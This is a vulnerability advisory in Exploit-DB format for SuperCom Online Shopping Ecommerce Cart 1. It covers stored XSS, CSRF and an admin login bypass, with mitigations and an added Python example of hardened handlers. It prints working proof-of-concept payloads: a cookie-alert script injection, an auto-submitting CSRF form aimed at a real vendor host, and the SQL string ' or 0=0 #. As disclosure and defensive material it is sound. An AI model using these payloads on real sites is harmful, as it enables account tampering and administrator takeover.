Vendor: Online Shopping Ecommerce Cart
By: L0RD
CVSS: 7.5 (HIGH)
Title: Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
Product Name: Online Shopping Ecommerce Cart
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Platforms Tested: Kali Linux
Year: 2018

SuperCom Online Shopping Ecommerce Cart 1 – Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass

SuperCom - Online Shopping Ecommerce Cart 1 suffers from three vulnerabilities. The first is persistent (stored) cross-site scripting: an attacker can place script in a profile field through the "Update profile" form, and it executes whenever that profile is viewed. The second is cross-site request forgery: the update-profile endpoint accepts a POST without any anti-forgery token, so a page under the attacker's control can submit a hidden form that silently changes the victim's profile data (name, mobile number, address) while the victim is logged in. The third is an authentication bypass on the /admin login: a crafted username containing a SQL-injection string, paired with any password, is accepted as a valid administrator login.

Mitigation:

No vendor patch is listed, so administrators should watch for a fixed release and update to it as soon as one is available. Until then the three issues map to standard fixes: HTML-encode profile fields (name, mobile, address) when they are rendered so stored input is displayed as text rather than executed as script; require a per-session anti-CSRF token on the update-profile POST and reject requests that omit or mismatch it; and issue the admin login query with bound parameters instead of string concatenation so a crafted username cannot rewrite the WHERE clause. Users should also avoid following untrusted links while logged in to the store, since the CSRF attack depends on an active session.

Exploit-DB raw data:

# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442
# Version: 1
# Tested on: Kali Linux

# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities:
# POC 1: Persistent cross site scripting:

1) After creating an account, go to your profile.
2) Navigate to "Update profile" and put this payload:
"/><script>alert(document.cookie)</script>
3) You will get an alert box in the page.

# POC 2: CSRF: Attacker can change user's authentication directly:

<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://ecommerce.thesoftking.com/updateprofile" method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

# POC 3: Authentication bypass:
Path: /admin
Username: ' or 0=0 #
Password: anything
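Added example, not part of the advisory or of the SuperCom product's code: a Python/sqlite3 stand-in for the three hardened handlers the mitigation section calls for, checked against the exact inputs the PoCs use. The admin table, the session dict and the handler names are constructed assumptions.

```python
import hmac
import html
import secrets
import sqlite3

# Profile fields posted by the update form in the advisory's CSRF PoC.
ALLOWED_PROFILE_FIELDS = ("name", "mobile", "address")


def make_db():
    """Constructed in-memory stand-in for an admin table (not the product's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    # Password storage is simplified here; a real deployment stores a slow hash.
    db.execute("INSERT INTO admins VALUES ('admin', 'correct-horse')")
    return db


def admin_login(db, username, password):
    """Hardened /admin check: the username is a bound parameter, so the PoC 3
    value ' or 0=0 # is compared as a literal string. Concatenated into the SQL
    it would read  WHERE username = '' or 0=0 #' AND password = '...'  which
    matches every row and comments out the password test (MySQL '#' comment)."""
    row = db.execute("SELECT password FROM admins WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0].encode(), password.encode())


def render_profile_field(value):
    """Encode a stored profile value on output so the PoC 1 payload
    "/><script>alert(document.cookie)</script> is displayed, not executed."""
    return '<span class="profile">%s</span>' % html.escape(value, quote=True)


def issue_csrf_token(session):
    """Mint a per-session token that the legitimate profile form must echo back."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def update_profile(session, profile, form):
    """Hardened /updateprofile: refuse any POST whose token is missing or does
    not match the session's. The PoC 2 auto-submitting form carries no token,
    so its cross-origin request is rejected before any field is changed."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    for field in ALLOWED_PROFILE_FIELDS:
        if field in form:
            profile[field] = form[field]
    return True
```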